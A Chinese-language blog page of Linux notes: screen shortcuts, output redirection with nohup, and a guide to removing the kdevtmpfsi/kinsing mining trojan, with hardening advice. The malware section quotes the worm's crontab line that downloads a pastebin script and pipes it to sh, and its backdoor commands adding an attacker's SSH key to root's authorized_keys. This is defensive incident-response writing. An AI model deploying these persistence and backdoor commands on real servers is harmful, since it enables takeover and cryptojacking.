</code></pre></div><ul><li>快捷键</li></ul> <ol><li><p>CTRL - a+d -&gt;(<strong>常用退出切换到后台运行</strong>) detach命令，暂时离开当前session，将目前的 screen session (可能含有多个 windows) 丢到后台执行，并会回到还没进 screen 时的状态，此时在 screen session 里，每个 window 内运行的 process (无论是前台/后台)都在继续执行，即使 logout 也不影响。</p></li> <li><p><s>CTRL- a+z -&gt; 把当前session放到后台执行，用 shell 的 fg 命令则可回去，基本没有用到</s>。</p></li> <li><p><code>screen -X -S 28835 quit</code>-&gt; 删除对应的session，其中的<code>28835</code>是通过命令<code>screen -ls</code>查看到的对应session的id。</p></li></ol> <h2 id="shell脚本中-dev-null-2-1"><a href="#shell脚本中-dev-null-2-1" class="header-anchor">#</a> shell脚本中&gt;/dev/null 2&gt;&amp;1</h2> <p>参考文档： https://www.cnblogs.com/youjianjiangnan/p/11561805.html</p> <p><code>&gt;/dev/null</code> 这条命令的作用是将标准输出1重定向到/dev/null中。 /dev/null代表linux的空设备文件，所有往这个文件里面写入的内容都会丢失，俗称“黑洞”。那么执行了&gt;/dev/null之后，标准输出就会不再存在，没有任何地方能够找到输出的内容。
<code>2&gt;&amp;1</code> 这条命令用到了重定向绑定，采用&amp;可以将两个输出绑定在一起。这条命令的作用是错误输出将和标准输出同用一个文件描述符，<strong>说人话就是错误输出将会和标准输出输出到同一个地方</strong>。</p> <p>linux在执行shell命令之前，就会确定好所有的输入输出位置，并且从左到右依次执行重定向的命令，所以&gt;/dev/null 2&gt;&amp;1的作用就是让<strong>标准输出重定向到/dev/null中（丢弃标准输出），然后错误输出由于重用了标准输出的描述符，所以错误输出也被定向到了/dev/null中，错误输出同样也被丢弃了。执行了这条命令之后，该条shell命令将不会输出任何信息到控制台，也不会有任何信息输出到文件中</strong>。</p> <h3 id="nohup结合"><a href="#nohup结合" class="header-anchor">#</a> nohup结合</h3> <p>我们经常使用nohup command &amp;命令形式来启动一些后台程序，比如一些java服务：</p> <div class="language- extra-class"><pre class="language-text"><code># nohup java -jar xxxx.jar &amp;
</code></pre></div><p>为了不让一些执行信息输出到前台（控制台），我们还会加上刚才提到的&gt;/dev/null 2&gt;&amp;1命令来丢弃所有的输出：</p> <div class="language- extra-class"><pre class="language-text"><code># nohup java -jar xxxx.jar &gt;/dev/null 2&gt;&amp;1 &amp;
</code></pre></div><p>总而言之，在工作中用到最多的就是<code>nohup command &gt;/dev/null 2&gt;&amp;1 &amp;</code>命令</p> <h2 id="挖矿木马病毒清理"><a href="#挖矿木马病毒清理" class="header-anchor">#</a> 挖矿木马病毒清理</h2> <p>问题： 无意在使用<code>top</code>命令的时候发现一个异常进程: <code>kdevtmpfsi</code>,使用<code>ps -aux | grep kdevtmpfsi</code>,发现对应的执行文件路径是: <code>/tmp/kdevtmpfsi</code>. 然后尝试<code>kill -9</code>杀死进程后，再<code>rm -rf /tmp/kdevtmpfsi</code>还是会死而复生。</p> <h3 id="木马解析"><a href="#木马解析" class="header-anchor">#</a> 木马解析</h3> <ol><li>木马解析： https://xz.aliyun.com/t/4386, https://my.oschina.net/u/4437985/blog/3168526 (推荐)</li></ol> <p>一般在定时任务（<code>crontab -l</code>）中存在异常脚本:</p> <div class="language- extra-class"><pre class="language-text"><code>[root@mdw ~]# crontab -l
*/15 * * * * （curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh
</code></pre></div><p>1). 攻击者通过网络进入第一台被感染的机器(redis未认证漏洞、ssh密码泄露登录等)。
2). 第一台感染的机器会读取known_hosts文件，遍历ssh登录，如果是做了免密登录认证，则将直接进行横向传播。
3). 修改/etc/cron.d/root文件，增加定时任务
4). kill掉同类挖矿进程
5). kill掉高好资源的其他进程
6). 下载执行主恶意程序kerberods
7). 拉起khugepageds挖矿进程
8). 为文件添加chattr锁定
9). 修改IPTABLES
10). 清除日志
11). 关闭SELinux
12). 还有个后门，创建/root/.ssh/authorized_keys，添加病毒作者自己的公钥，保证其可以使用SSH登录到服务器，具体代码如下</p> <div class="language- extra-class"><pre class="language-text"><code>chmod 700 /root/.ssh/
echo &gt;&gt; /root/.ssh/authorized_keys
chmod 600 root/.ssh/authorized_keys
echo &quot;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17&quot; &gt;&gt; /root/.ssh/authorized_keys


</code></pre></div><h3 id="木马分析"><a href="#木马分析" class="header-anchor">#</a> 木马分析</h3> <ol><li>继续查看对应的定时任务目录<code>nano /etc/crontab</code>,发现没有对应的病毒形式的定时任务。继续查看用户目录下的定时任务: <code>/var/spool/cron/</code>也没有发现非法的定时任务。</li></ol> <div class="language- extra-class"><pre class="language-text"><code>$ nano /var/spool/cron/crontabs/root

$ nano /var/spool/cron/root

$ nano /etc/cron.d/root

</code></pre></div><ol start="2"><li><p>这个线程重复启动的原因是<strong>它还有一个守护线程在运行</strong>，检测到这个线程挂掉的时候就去重新启动，从而导致我们周而复始的出现这个问题。PS： 通过 <code>ps -ef</code> 命令查出 <code>kdevtmpfsi</code> 进程号，直接 kill -9 进程号并删除 /tmp/kdevtmpfsi 执行文件。但没有过1分钟进程又运行了，这时就能想到，kdevtmpfsi 有守护程序或者有计划任务。通过 crontab -l 查看是否有可疑的计划任务。</p></li> <li><p>找到线程和守护线程
根据上面结果知道 kdevtmpfsi 进程号是 10393，使用 <code>systemctl status 10393</code> 发现 <code>kdevtmpfsi</code> 有守护进程
kill 掉 kdevtmpfsi 守护进程 kill -9 30903 30904，再 killall -9 kdevtmpfsi 挖矿病毒，最后删除 kdevtmpfsi 执行程序 rm -f /tmp/kdevtmpfsi</p></li></ol> <div class="language- extra-class"><pre class="language-text"><code>$ pstree -a
$ netstat -natp
</code></pre></div><p>这时候我们就可以找到kdevtmpfsi线程 和它的守护线程<code>kinsing</code>.直接kill线程和它的守护线程:</p> <div class="language- extra-class"><pre class="language-text"><code>$ ps -aux | grep curl
$ ps -aux|grep kinsing
$ ps -aux|grep kdevtmpfsi


$ kill -9 19128
$ kill -9 3722
$ rm -rf /tmp/kdevtmpfsi
$ rm -rf /var/tmp/kinsing
$ find / -name &quot;kinsing*&quot; | xargs rm -rf
$ find / -name kdevtmpfsi | xargs rm -rf
$ rm -f /root/.ssh/authorized_keys
</code></pre></div><ol start="4"><li>查找可疑定时任务</li></ol> <div class="language- extra-class"><pre class="language-text"><code># 首先停止cron服务，避免因其不断执行而导致恶意文件反复下载执行。如果操作系统可以使用service命令
systemctl stop cron
crontab -l 查看定时任务
crontab -r 表示删除用户的定时任务，当执行此命令后，所有用户下面的定时任务会被删除
</code></pre></div><p><img src="https://img-blog.csdnimg.cn/20191227100428997.png" alt="https://img-blog.csdnimg.cn/20191227100428997.png"></p> <p>删除可以定时任务<code>crontab -e</code>,编辑删除定时任务即可。</p> <ol start="5"><li>安全加固</li></ol> <p>5.1. SSH
① 谨慎做免密登录
② 不使用默认的22端口
③ 禁止root登录</p> <p>5.2. Redis
① 增加授权认证(requirepass参数)
② 尽量使用docker版本(docker pull redis)
③ 隐藏重要的命令</p> <p>5.3 使用busybox删除</p> <p>5.4 屏蔽<code>pastebin.com</code>、thrysi.com等广泛被挖矿蠕虫利用的网站，达到阻断入侵的目的</p> <p>5.6 <code>netstat -natp</code> 命令查看是否有异常陌生IP的TCP连接，查询到有来自国外的陌生IP，做了白名单处理</p> <p>5.7 启用ssh公钥登陆，禁用密码登陆。
5.8 云主机：完善安全策略，入口流量，一般只开放 80 443 端口就行，出口流量默认可以不限制，如果有需要根据需求来限制。物理机：可以通过硬件防火墙或者机器上iptables 来开放出入口流量规则。
5.9 本机不是直接需要对外提供服务，可以拒绝外网卡入口所有流量，通过 jumper 机器内网登陆业务机器。</p> <h3 id="常见非法的木马病毒"><a href="#常见非法的木马病毒" class="header-anchor">#</a> 常见非法的木马病毒</h3> <table><thead><tr><th>挖矿病毒</th> <th>正常文件</th> <th>关联文件</th> <th>原因</th></tr></thead> <tbody><tr><td>kdevtmpfsi</td> <td>kdevtmpfs</td> <td>kinsing</td> <td>最根本的原因是自己的redis 6379配置不当导致的。大家可以参考阿里云的Redis服务安全加固</td></tr> <tr><td>Watchdogs</td> <td>Watchdog</td> <td></td> <td></td></tr> <tr><td>trace</td> <td>trace</td> <td></td> <td></td></tr></tbody></table></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">最后更新: </span> <span class="time">8/19/2020, 8:31:09 AM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev">
        ←
        <a href="/blog/setup/raspberry-setup.html" class="prev">
          树莓派Linux安装及其环境配置
        </a></span> <span class="next"><a href="/blog/setup/nginx-setup.html">
          Nginx Linux安装及其环境配置
        </a>
        →
      </span></p></div> </main></div><div class="global-ui"><!----></div></div>
    <script src="/assets/js/app.8a5f3a7e.js" defer></script><script src="/assets/js/3.5bbf39f9.js" defer></script><script src="/assets/js/85.82619656.js" defer></script>
  </body>
</html>
